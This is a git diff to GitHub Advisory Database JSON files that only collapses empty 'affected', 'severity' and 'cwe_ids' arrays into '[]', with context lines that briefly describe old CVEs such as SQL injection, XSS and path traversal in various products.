diff --git a/advisories/unreviewed/2022/05/GHSA-f679-g5v6-6qqr/GHSA-f679-g5v6-6qqr.json b/advisories/unreviewed/2022/05/GHSA-f679-g5v6-6qqr/GHSA-f679-g5v6-6qqr.json
index 7f5486efbb4..26190bebca2 100644
--- a/advisories/unreviewed/2022/05/GHSA-f679-g5v6-6qqr/GHSA-f679-g5v6-6qqr.json
+++ b/advisories/unreviewed/2022/05/GHSA-f679-g5v6-6qqr/GHSA-f679-g5v6-6qqr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f764-r8p2-m2gv/GHSA-f764-r8p2-m2gv.json b/advisories/unreviewed/2022/05/GHSA-f764-r8p2-m2gv/GHSA-f764-r8p2-m2gv.json
index 2bb701cde75..2e4c3c1ed14 100644
--- a/advisories/unreviewed/2022/05/GHSA-f764-r8p2-m2gv/GHSA-f764-r8p2-m2gv.json
+++ b/advisories/unreviewed/2022/05/GHSA-f764-r8p2-m2gv/GHSA-f764-r8p2-m2gv.json
@@ -7,12 +7,8 @@
"CVE-2014-5017"
],
"details": "SQL injection vulnerability in CPDB in application/controllers/admin/participantsaction.php in LimeSurvey 2.05+ Build 140618 allows remote attackers to execute arbitrary SQL commands via the sidx parameter in a JSON request to admin/participants/sa/getParticipants_json, related to a search parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-f9pv-7pxf-272g/GHSA-f9pv-7pxf-272g.json b/advisories/unreviewed/2022/05/GHSA-f9pv-7pxf-272g/GHSA-f9pv-7pxf-272g.json
index 982bd9c60ff..90dafd962bd 100644
--- a/advisories/unreviewed/2022/05/GHSA-f9pv-7pxf-272g/GHSA-f9pv-7pxf-272g.json
+++ b/advisories/unreviewed/2022/05/GHSA-f9pv-7pxf-272g/GHSA-f9pv-7pxf-272g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-ff6r-62wv-fr5p/GHSA-ff6r-62wv-fr5p.json b/advisories/unreviewed/2022/05/GHSA-ff6r-62wv-fr5p/GHSA-ff6r-62wv-fr5p.json
index 51f901221ec..40bc7e9c00a 100644
--- a/advisories/unreviewed/2022/05/GHSA-ff6r-62wv-fr5p/GHSA-ff6r-62wv-fr5p.json
+++ b/advisories/unreviewed/2022/05/GHSA-ff6r-62wv-fr5p/GHSA-ff6r-62wv-fr5p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-ffjw-6mf8-2rj5/GHSA-ffjw-6mf8-2rj5.json b/advisories/unreviewed/2022/05/GHSA-ffjw-6mf8-2rj5/GHSA-ffjw-6mf8-2rj5.json
index 7abfb25bccd..f1a1e76d6d7 100644
--- a/advisories/unreviewed/2022/05/GHSA-ffjw-6mf8-2rj5/GHSA-ffjw-6mf8-2rj5.json
+++ b/advisories/unreviewed/2022/05/GHSA-ffjw-6mf8-2rj5/GHSA-ffjw-6mf8-2rj5.json
@@ -7,12 +7,8 @@
"CVE-2014-4946"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in Horde Internet Mail Program (IMP) before 6.1.8, as used in Horde Groupware Webmail Edition before 5.1.5, allow remote attackers to inject arbitrary web script or HTML via (1) unspecified flags or (2) a mailbox name in the dynamic mailbox view.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-fg32-5982-62p3/GHSA-fg32-5982-62p3.json b/advisories/unreviewed/2022/05/GHSA-fg32-5982-62p3/GHSA-fg32-5982-62p3.json
index 040d29db233..54c8ddb3c41 100644
--- a/advisories/unreviewed/2022/05/GHSA-fg32-5982-62p3/GHSA-fg32-5982-62p3.json
+++ b/advisories/unreviewed/2022/05/GHSA-fg32-5982-62p3/GHSA-fg32-5982-62p3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-fh95-mfxg-8gjv/GHSA-fh95-mfxg-8gjv.json b/advisories/unreviewed/2022/05/GHSA-fh95-mfxg-8gjv/GHSA-fh95-mfxg-8gjv.json
index 3b18dbd85b0..7b3cd7809e2 100644
--- a/advisories/unreviewed/2022/05/GHSA-fh95-mfxg-8gjv/GHSA-fh95-mfxg-8gjv.json
+++ b/advisories/unreviewed/2022/05/GHSA-fh95-mfxg-8gjv/GHSA-fh95-mfxg-8gjv.json
@@ -7,12 +7,8 @@
"CVE-2014-4940"
],
"details": "Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-fp86-8x43-rmmp/GHSA-fp86-8x43-rmmp.json b/advisories/unreviewed/2022/05/GHSA-fp86-8x43-rmmp/GHSA-fp86-8x43-rmmp.json
index bf605f39379..47e49ecb141 100644
--- a/advisories/unreviewed/2022/05/GHSA-fp86-8x43-rmmp/GHSA-fp86-8x43-rmmp.json
+++ b/advisories/unreviewed/2022/05/GHSA-fp86-8x43-rmmp/GHSA-fp86-8x43-rmmp.json
@@ -7,12 +7,8 @@
"CVE-2014-4588"
],
"details": "Cross-site scripting (XSS) vulnerability in tpls/editmedia.php in the Hot Files: File Sharing and Download Manager (wphotfiles) plugin 1.0.0 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the mediaid parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-fv2w-9xwx-h37w/GHSA-fv2w-9xwx-h37w.json b/advisories/unreviewed/2022/05/GHSA-fv2w-9xwx-h37w/GHSA-fv2w-9xwx-h37w.json
index 01563361f5b..9bb65f6afe8 100644
--- a/advisories/unreviewed/2022/05/GHSA-fv2w-9xwx-h37w/GHSA-fv2w-9xwx-h37w.json
+++ b/advisories/unreviewed/2022/05/GHSA-fv2w-9xwx-h37w/GHSA-fv2w-9xwx-h37w.json
@@ -7,12 +7,8 @@
"CVE-2013-6221"
],
"details": "Directory traversal vulnerability in CommunicationServlet in HP Service Virtualization 3.x before 3.50.1, when the AutoPass license server is enabled, allows remote attackers to create arbitrary files and consequently execute arbitrary code via unspecified vectors, aka ZDI-CAN-2031.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-fv3c-2w3v-8v8j/GHSA-fv3c-2w3v-8v8j.json b/advisories/unreviewed/2022/05/GHSA-fv3c-2w3v-8v8j/GHSA-fv3c-2w3v-8v8j.json
index 2befbe62da8..265e5356772 100644
--- a/advisories/unreviewed/2022/05/GHSA-fv3c-2w3v-8v8j/GHSA-fv3c-2w3v-8v8j.json
+++ b/advisories/unreviewed/2022/05/GHSA-fv3c-2w3v-8v8j/GHSA-fv3c-2w3v-8v8j.json
@@ -7,12 +7,8 @@
"CVE-2014-0762"
],
"details": "The DNP3 driver in CG Automation ePAQ-9410 Substation Gateway allows physically proximate attackers to cause a denial of service (infinite loop or process crash) via crafted input over a serial line.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-fwvg-xhvh-cwfv/GHSA-fwvg-xhvh-cwfv.json b/advisories/unreviewed/2022/05/GHSA-fwvg-xhvh-cwfv/GHSA-fwvg-xhvh-cwfv.json
index 28fdb1744f9..5da6e3c96b9 100644
--- a/advisories/unreviewed/2022/05/GHSA-fwvg-xhvh-cwfv/GHSA-fwvg-xhvh-cwfv.json
+++ b/advisories/unreviewed/2022/05/GHSA-fwvg-xhvh-cwfv/GHSA-fwvg-xhvh-cwfv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-fx3v-mp3q-m7vg/GHSA-fx3v-mp3q-m7vg.json b/advisories/unreviewed/2022/05/GHSA-fx3v-mp3q-m7vg/GHSA-fx3v-mp3q-m7vg.json
index 48ae36723be..c1b90724e3a 100644
--- a/advisories/unreviewed/2022/05/GHSA-fx3v-mp3q-m7vg/GHSA-fx3v-mp3q-m7vg.json
+++ b/advisories/unreviewed/2022/05/GHSA-fx3v-mp3q-m7vg/GHSA-fx3v-mp3q-m7vg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-fx55-2gc2-q86h/GHSA-fx55-2gc2-q86h.json b/advisories/unreviewed/2022/05/GHSA-fx55-2gc2-q86h/GHSA-fx55-2gc2-q86h.json
index b88e2557514..5e5983db4fc 100644
--- a/advisories/unreviewed/2022/05/GHSA-fx55-2gc2-q86h/GHSA-fx55-2gc2-q86h.json
+++ b/advisories/unreviewed/2022/05/GHSA-fx55-2gc2-q86h/GHSA-fx55-2gc2-q86h.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-fxf5-773f-7r9h/GHSA-fxf5-773f-7r9h.json b/advisories/unreviewed/2022/05/GHSA-fxf5-773f-7r9h/GHSA-fxf5-773f-7r9h.json
index 1c0fcb490ca..cb8a9be624d 100644
--- a/advisories/unreviewed/2022/05/GHSA-fxf5-773f-7r9h/GHSA-fxf5-773f-7r9h.json
+++ b/advisories/unreviewed/2022/05/GHSA-fxf5-773f-7r9h/GHSA-fxf5-773f-7r9h.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-fxq5-fxpw-xh78/GHSA-fxq5-fxpw-xh78.json b/advisories/unreviewed/2022/05/GHSA-fxq5-fxpw-xh78/GHSA-fxq5-fxpw-xh78.json
index 9100d4b551c..4d6311a5f98 100644
--- a/advisories/unreviewed/2022/05/GHSA-fxq5-fxpw-xh78/GHSA-fxq5-fxpw-xh78.json
+++ b/advisories/unreviewed/2022/05/GHSA-fxq5-fxpw-xh78/GHSA-fxq5-fxpw-xh78.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-g2wf-v8q9-85jj/GHSA-g2wf-v8q9-85jj.json b/advisories/unreviewed/2022/05/GHSA-g2wf-v8q9-85jj/GHSA-g2wf-v8q9-85jj.json
index cbe9f33700b..6b281e459f4 100644
--- a/advisories/unreviewed/2022/05/GHSA-g2wf-v8q9-85jj/GHSA-g2wf-v8q9-85jj.json
+++ b/advisories/unreviewed/2022/05/GHSA-g2wf-v8q9-85jj/GHSA-g2wf-v8q9-85jj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-g3mw-cwj5-rvgj/GHSA-g3mw-cwj5-rvgj.json b/advisories/unreviewed/2022/05/GHSA-g3mw-cwj5-rvgj/GHSA-g3mw-cwj5-rvgj.json
index 978d5efe442..64e486a3ec6 100644
--- a/advisories/unreviewed/2022/05/GHSA-g3mw-cwj5-rvgj/GHSA-g3mw-cwj5-rvgj.json
+++ b/advisories/unreviewed/2022/05/GHSA-g3mw-cwj5-rvgj/GHSA-g3mw-cwj5-rvgj.json
@@ -7,12 +7,8 @@
"CVE-2013-2023"
],
"details": "Cross-site scripting (XSS) vulnerability in actionscript/Jplayer.as in the Flash SWF component (jplayer.swf) in jPlayer before 2.3.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to incomplete blacklists, a different vulnerability than CVE-2013-1942 and CVE-2013-2022.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-g5f7-9xpc-633r/GHSA-g5f7-9xpc-633r.json b/advisories/unreviewed/2022/05/GHSA-g5f7-9xpc-633r/GHSA-g5f7-9xpc-633r.json
index bc6713e4088..7968c642c14 100644
--- a/advisories/unreviewed/2022/05/GHSA-g5f7-9xpc-633r/GHSA-g5f7-9xpc-633r.json
+++ b/advisories/unreviewed/2022/05/GHSA-g5f7-9xpc-633r/GHSA-g5f7-9xpc-633r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-g5vg-6rhr-3832/GHSA-g5vg-6rhr-3832.json b/advisories/unreviewed/2022/05/GHSA-g5vg-6rhr-3832/GHSA-g5vg-6rhr-3832.json
index 6f95dd6c429..fe2b93b97e8 100644
--- a/advisories/unreviewed/2022/05/GHSA-g5vg-6rhr-3832/GHSA-g5vg-6rhr-3832.json
+++ b/advisories/unreviewed/2022/05/GHSA-g5vg-6rhr-3832/GHSA-g5vg-6rhr-3832.json
@@ -7,12 +7,8 @@
"CVE-2014-1956"
],
"details": "CRLF injection vulnerability in FortiGuard FortiWeb before 5.0.3 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-g7f7-x49j-c934/GHSA-g7f7-x49j-c934.json b/advisories/unreviewed/2022/05/GHSA-g7f7-x49j-c934/GHSA-g7f7-x49j-c934.json
index 0967ed688fe..8dffeeb5254 100644
--- a/advisories/unreviewed/2022/05/GHSA-g7f7-x49j-c934/GHSA-g7f7-x49j-c934.json
+++ b/advisories/unreviewed/2022/05/GHSA-g7f7-x49j-c934/GHSA-g7f7-x49j-c934.json
@@ -7,12 +7,8 @@
"CVE-2014-4852"
],
"details": "SQL injection vulnerability in admin/uploads.php in The Digital Craft AtomCMS, possibly 2.0, allows remote attackers to execute arbitrary SQL commands via the id parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-g7x4-v7hr-5ph2/GHSA-g7x4-v7hr-5ph2.json b/advisories/unreviewed/2022/05/GHSA-g7x4-v7hr-5ph2/GHSA-g7x4-v7hr-5ph2.json
index b352623d9a8..283744b634f 100644
--- a/advisories/unreviewed/2022/05/GHSA-g7x4-v7hr-5ph2/GHSA-g7x4-v7hr-5ph2.json
+++ b/advisories/unreviewed/2022/05/GHSA-g7x4-v7hr-5ph2/GHSA-g7x4-v7hr-5ph2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-g94v-8mrm-p53c/GHSA-g94v-8mrm-p53c.json b/advisories/unreviewed/2022/05/GHSA-g94v-8mrm-p53c/GHSA-g94v-8mrm-p53c.json
index 769a193ae5e..6f6e0f895b2 100644
--- a/advisories/unreviewed/2022/05/GHSA-g94v-8mrm-p53c/GHSA-g94v-8mrm-p53c.json
+++ b/advisories/unreviewed/2022/05/GHSA-g94v-8mrm-p53c/GHSA-g94v-8mrm-p53c.json
@@ -7,12 +7,8 @@
"CVE-2014-2967"
],
"details": "Autodesk VRED Professional 2014 before SR1 SP8 allows remote attackers to execute arbitrary code via Python os library calls in Python API commands to the integrated web server.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-gcc8-9qcm-vmc4/GHSA-gcc8-9qcm-vmc4.json b/advisories/unreviewed/2022/05/GHSA-gcc8-9qcm-vmc4/GHSA-gcc8-9qcm-vmc4.json
index e3e59dbeb25..fe7100a890e 100644
--- a/advisories/unreviewed/2022/05/GHSA-gcc8-9qcm-vmc4/GHSA-gcc8-9qcm-vmc4.json
+++ b/advisories/unreviewed/2022/05/GHSA-gcc8-9qcm-vmc4/GHSA-gcc8-9qcm-vmc4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-gcpq-g2qm-gjvr/GHSA-gcpq-g2qm-gjvr.json b/advisories/unreviewed/2022/05/GHSA-gcpq-g2qm-gjvr/GHSA-gcpq-g2qm-gjvr.json
index d20ece46750..221fbdfcc68 100644
--- a/advisories/unreviewed/2022/05/GHSA-gcpq-g2qm-gjvr/GHSA-gcpq-g2qm-gjvr.json
+++ b/advisories/unreviewed/2022/05/GHSA-gcpq-g2qm-gjvr/GHSA-gcpq-g2qm-gjvr.json
@@ -7,12 +7,8 @@
"CVE-2010-5110"
],
"details": "DCTStream.cc in Poppler before 0.13.3 allows remote attackers to cause a denial of service (crash) via a crafted PDF file.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-gcr2-226m-p44h/GHSA-gcr2-226m-p44h.json b/advisories/unreviewed/2022/05/GHSA-gcr2-226m-p44h/GHSA-gcr2-226m-p44h.json
index 06630ddd10e..25f7b807dba 100644
--- a/advisories/unreviewed/2022/05/GHSA-gcr2-226m-p44h/GHSA-gcr2-226m-p44h.json
+++ b/advisories/unreviewed/2022/05/GHSA-gcr2-226m-p44h/GHSA-gcr2-226m-p44h.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-ggrp-9xg2-5hmh/GHSA-ggrp-9xg2-5hmh.json b/advisories/unreviewed/2022/05/GHSA-ggrp-9xg2-5hmh/GHSA-ggrp-9xg2-5hmh.json
index ef5a555d07a..4335beae3fb 100644
--- a/advisories/unreviewed/2022/05/GHSA-ggrp-9xg2-5hmh/GHSA-ggrp-9xg2-5hmh.json
+++ b/advisories/unreviewed/2022/05/GHSA-ggrp-9xg2-5hmh/GHSA-ggrp-9xg2-5hmh.json
@@ -7,12 +7,8 @@
"CVE-2014-4542"
],
"details": "Cross-site scripting (XSS) vulnerability in redirect.php in the Ooorl plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-gjpj-cpg9-vmp5/GHSA-gjpj-cpg9-vmp5.json b/advisories/unreviewed/2022/05/GHSA-gjpj-cpg9-vmp5/GHSA-gjpj-cpg9-vmp5.json
index b2696ed52f9..0907143596a 100644
--- a/advisories/unreviewed/2022/05/GHSA-gjpj-cpg9-vmp5/GHSA-gjpj-cpg9-vmp5.json
+++ b/advisories/unreviewed/2022/05/GHSA-gjpj-cpg9-vmp5/GHSA-gjpj-cpg9-vmp5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-gm87-4493-w2gq/GHSA-gm87-4493-w2gq.json b/advisories/unreviewed/2022/05/GHSA-gm87-4493-w2gq/GHSA-gm87-4493-w2gq.json
index 4915c578beb..bc3dbaba988 100644
--- a/advisories/unreviewed/2022/05/GHSA-gm87-4493-w2gq/GHSA-gm87-4493-w2gq.json
+++ b/advisories/unreviewed/2022/05/GHSA-gm87-4493-w2gq/GHSA-gm87-4493-w2gq.json
@@ -7,12 +7,8 @@
"CVE-2014-2842"
],
"details": "Juniper ScreenOS 6.3 and earlier allows remote attackers to cause a denial of service (crash and restart or failover) via a malformed SSL/TLS packet.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -40,9 +36,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-gmj6-7x7c-h6cj/GHSA-gmj6-7x7c-h6cj.json b/advisories/unreviewed/2022/05/GHSA-gmj6-7x7c-h6cj/GHSA-gmj6-7x7c-h6cj.json
index ae135180e8f..fc92fe68cea 100644
--- a/advisories/unreviewed/2022/05/GHSA-gmj6-7x7c-h6cj/GHSA-gmj6-7x7c-h6cj.json
+++ b/advisories/unreviewed/2022/05/GHSA-gmj6-7x7c-h6cj/GHSA-gmj6-7x7c-h6cj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-gqwq-mfx3-p24m/GHSA-gqwq-mfx3-p24m.json b/advisories/unreviewed/2022/05/GHSA-gqwq-mfx3-p24m/GHSA-gqwq-mfx3-p24m.json
index 93f45ef3770..88c248a0c13 100644
--- a/advisories/unreviewed/2022/05/GHSA-gqwq-mfx3-p24m/GHSA-gqwq-mfx3-p24m.json
+++ b/advisories/unreviewed/2022/05/GHSA-gqwq-mfx3-p24m/GHSA-gqwq-mfx3-p24m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-gr4j-7v97-rrfc/GHSA-gr4j-7v97-rrfc.json b/advisories/unreviewed/2022/05/GHSA-gr4j-7v97-rrfc/GHSA-gr4j-7v97-rrfc.json
index 1c01889aeca..6ec4e85b0e8 100644
--- a/advisories/unreviewed/2022/05/GHSA-gr4j-7v97-rrfc/GHSA-gr4j-7v97-rrfc.json
+++ b/advisories/unreviewed/2022/05/GHSA-gr4j-7v97-rrfc/GHSA-gr4j-7v97-rrfc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-grrj-5c92-774h/GHSA-grrj-5c92-774h.json b/advisories/unreviewed/2022/05/GHSA-grrj-5c92-774h/GHSA-grrj-5c92-774h.json
index df0030510c3..3bc8edbc566 100644
--- a/advisories/unreviewed/2022/05/GHSA-grrj-5c92-774h/GHSA-grrj-5c92-774h.json
+++ b/advisories/unreviewed/2022/05/GHSA-grrj-5c92-774h/GHSA-grrj-5c92-774h.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-gvc2-c45p-m2r9/GHSA-gvc2-c45p-m2r9.json b/advisories/unreviewed/2022/05/GHSA-gvc2-c45p-m2r9/GHSA-gvc2-c45p-m2r9.json
index 771be956658..8b279f9b742 100644
--- a/advisories/unreviewed/2022/05/GHSA-gvc2-c45p-m2r9/GHSA-gvc2-c45p-m2r9.json
+++ b/advisories/unreviewed/2022/05/GHSA-gvc2-c45p-m2r9/GHSA-gvc2-c45p-m2r9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-gvgr-6rhc-c764/GHSA-gvgr-6rhc-c764.json b/advisories/unreviewed/2022/05/GHSA-gvgr-6rhc-c764/GHSA-gvgr-6rhc-c764.json
index 5c9eb882e1a..716242bca6f 100644
--- a/advisories/unreviewed/2022/05/GHSA-gvgr-6rhc-c764/GHSA-gvgr-6rhc-c764.json
+++ b/advisories/unreviewed/2022/05/GHSA-gvgr-6rhc-c764/GHSA-gvgr-6rhc-c764.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json b/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json
index 88fe412e76b..438b345021b 100644
--- a/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json
+++ b/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h23j-wq46-j49h/GHSA-h23j-wq46-j49h.json b/advisories/unreviewed/2022/05/GHSA-h23j-wq46-j49h/GHSA-h23j-wq46-j49h.json
index 4684611a95b..0d325922b39 100644
--- a/advisories/unreviewed/2022/05/GHSA-h23j-wq46-j49h/GHSA-h23j-wq46-j49h.json
+++ b/advisories/unreviewed/2022/05/GHSA-h23j-wq46-j49h/GHSA-h23j-wq46-j49h.json
@@ -7,12 +7,8 @@
"CVE-2014-4941"
],
"details": "Absolute path traversal vulnerability in Cross-RSS (wp-cross-rss) plugin 1.7 for WordPress allows remote attackers to read arbitrary files via a full pathname in the rss parameter to proxy.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-h2j4-3hpq-4rrx/GHSA-h2j4-3hpq-4rrx.json b/advisories/unreviewed/2022/05/GHSA-h2j4-3hpq-4rrx/GHSA-h2j4-3hpq-4rrx.json
index 15587b83143..1242abb7639 100644
--- a/advisories/unreviewed/2022/05/GHSA-h2j4-3hpq-4rrx/GHSA-h2j4-3hpq-4rrx.json
+++ b/advisories/unreviewed/2022/05/GHSA-h2j4-3hpq-4rrx/GHSA-h2j4-3hpq-4rrx.json
@@ -13,9 +13,7 @@
